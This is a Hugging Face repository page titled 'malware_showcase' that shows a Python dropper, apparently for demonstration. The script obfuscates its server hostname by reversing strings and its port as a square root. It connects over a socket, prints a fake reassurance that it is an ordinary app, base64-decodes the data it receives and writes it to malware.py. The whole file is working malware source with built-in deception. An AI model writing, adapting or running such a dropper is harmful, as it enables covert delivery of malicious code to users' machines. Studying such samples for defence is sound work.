Hugging Face's logo

XManFromXlab
/
malware_showcase

Model card Files
xet
 Community
malware_showcase
File size: 2,655 Bytes
bb5fa15
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/env python3

""" Implementation of dropper that downloads malicious code from the server
    and dumps it into a file.
"""

import base64
import logging
import socket
import math


class Dropper:
    """ This class represents the implementation of dropper.
    """

    def __init__(self, host1, host2, number):
        # Construct hostname of the remote server from the first two
        # arguments.
        self._host = self.decode_hostname(host1, host2)
        # Calculate the port number from the last argument.
        self._port = self.decode_port(number)
        # Initialize socket for the connection.
        self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    @property
    def host(self):
        """ Server that sends us the malicious code. """
        return self._host

    @host.setter
    def host(self, new_host):
        self._host = new_host

    def decode_hostname(self, str1, str2):
        """ Returns hostname of the remote server. """
        return str2[::-1] + str1[::-1]

    @property
    def port(self):
        """ Port, on which the server runs (`int`). """
        return self._port

    @port.setter
    def port(self, new_port):
        self._port = new_port

    def decode_port(self, port):
        """Returns target port of the remote server. """
        return int(math.sqrt(port))

    @property
    def socket(self):
        """ Client socket. """
        return self._socket

    def dump_data(self, data):
        """ Write the retrieved data from the server into the file.
        """
        with open('malware.py', 'wb') as file:
            file.write(data)

    def download_malicious_code(self):
        """ Download malicious code from the server. """
        # Create a connection to the server.
        try:
            self.socket.connect((self.host, self.port))
        except socket.error:
            logging.debug('Dropper could not connect to the server.')
            return

        # Try to act as an ordinary application.
        print(
            'Hello, this is a totally ordinary app. '
            'I\'m surely not doing anything malicous'
        )

        # Receive the malicious code in the encrypted form.
        command = self.socket.recv(1000)
        # Decode the command and dump it into a file.
        decode_payload = base64.b64decode(command)
        self.dump_data(decode_payload)


if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)

    # Initialize dropper application.
    dropper = Dropper('tsoh', 'lacol', 729000000)
    # Collect the malicious code and dump it into the file.
    dropper.download_malicious_code()